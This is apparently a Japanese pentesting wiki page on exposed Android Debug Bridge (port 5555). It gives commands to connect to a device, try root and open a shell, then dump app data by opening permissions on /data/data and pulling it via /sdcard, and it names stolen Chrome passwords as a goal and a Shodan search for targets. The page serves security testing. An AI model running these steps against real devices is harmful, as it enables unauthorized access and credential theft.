5555 - Android Debug Bridge

基本情報

From the docs:

Android Debug Bridge (adb) は、デバイスと通信するための多目的なコマンドラインツールです。adbコマンドは、アプリのインストールやデバッグなど、さまざまなデバイスアクションを容易にし、Unixシェルへのアクセスを提供し、デバイス上でさまざまなコマンドを実行することができます。

デフォルトポート: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

接続

デバイスのポートでADBサービスが実行されているのを見つけ、それに接続できれば、システム内でシェルを取得できます:

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

以下のページでさらにADBコマンドを確認してください：

{{#ref}} ../mobile-pentesting/android-app-pentesting/adb-commands.md {{#endref}}

アプリデータのダンプ

アプリケーションのデータを完全にダウンロードするには、次のようにします：

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

このトリックを使用して、Chromeのパスワードのような機密情報を取得できます。この件に関する詳細は、提供された情報をこちらで確認してください。

Shodan

android debug bridge

1.9 KiB Raw Blame History Unescape Escape

5555 - Android Debug Bridge

基本情報

接続

アプリデータのダンプ

Shodan

1.9 KiB

Raw Blame History